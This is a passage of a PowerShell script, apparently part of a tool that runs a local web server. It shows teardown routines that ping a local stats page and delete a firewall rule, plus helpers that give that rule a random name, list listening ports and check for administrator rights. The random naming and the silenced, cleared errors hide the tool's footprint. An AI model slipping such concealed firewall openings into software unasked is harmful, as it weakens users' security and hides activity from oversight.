    } catch {}
    try {
        $webClient = New-Object System.Net.WebClient
        $webClient.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()
        $webClient.DownloadString("http://localhost:$serverPort/plugins/77/v1.0/stats.php")|Out-Null            
    } catch {}
    $error.clear()
    Netsh.exe advfirewall firewall del rule name="$firewallName"
}
function StopDaisy {    
    try {
        $webClient = New-Object System.Net.WebClient
        $webClient.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()
        $webClient.DownloadString("http://localhost:$serverPort/plugins/77/v1.0/stats.php")|Out-Null            
    } catch {}
    try {
        $webClient = New-Object System.Net.WebClient
        $webClient.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()
        $webClient.DownloadString("http://localhost:$serverPort/plugins/77/v1.0/stats.php")|Out-Null            
    } catch {}
    $error.clear()
    Netsh.exe advfirewall firewall del rule name="$firewallName"
}

function Get-FirewallName 
{
param (
    [int]$Length
)
$set    = 'abcdefghijklmnopqrstuvwxyz0123456789'.ToCharArray()
$result = ''
for ($x = 0; $x -lt $Length; $x++) 
{
    $result += $set | Get-Random
}
return $result
}
Function Invoke-Netstat {                       
try {            
    $TCPProperties = [System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties()            
    $Connections = $TCPProperties.GetActiveTcpListeners()            
    foreach($Connection in $Connections) {            
        if($Connection.address.AddressFamily -eq "InterNetwork" ) { $IPType = "IPv4" } else { $IPType = "IPv6" }
        $OutputObj = New-Object -TypeName PSobject            
        $OutputObj | Add-Member -MemberType NoteProperty -Name "LocalAddress" -Value $connection.Address            
        $OutputObj | Add-Member -MemberType NoteProperty -Name "ListeningPort" -Value $Connection.Port            
        $OutputObj | Add-Member -MemberType NoteProperty -Name "IPV4Or6" -Value $IPType            
        $OutputObj            
    }            
            
} catch {            
    Write-Error "Failed to get listening connections. $_"            
}
}
function Test-Administrator  
{  
    $user = [Security.Principal.WindowsIdentity]::GetCurrent();
    (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)  
}

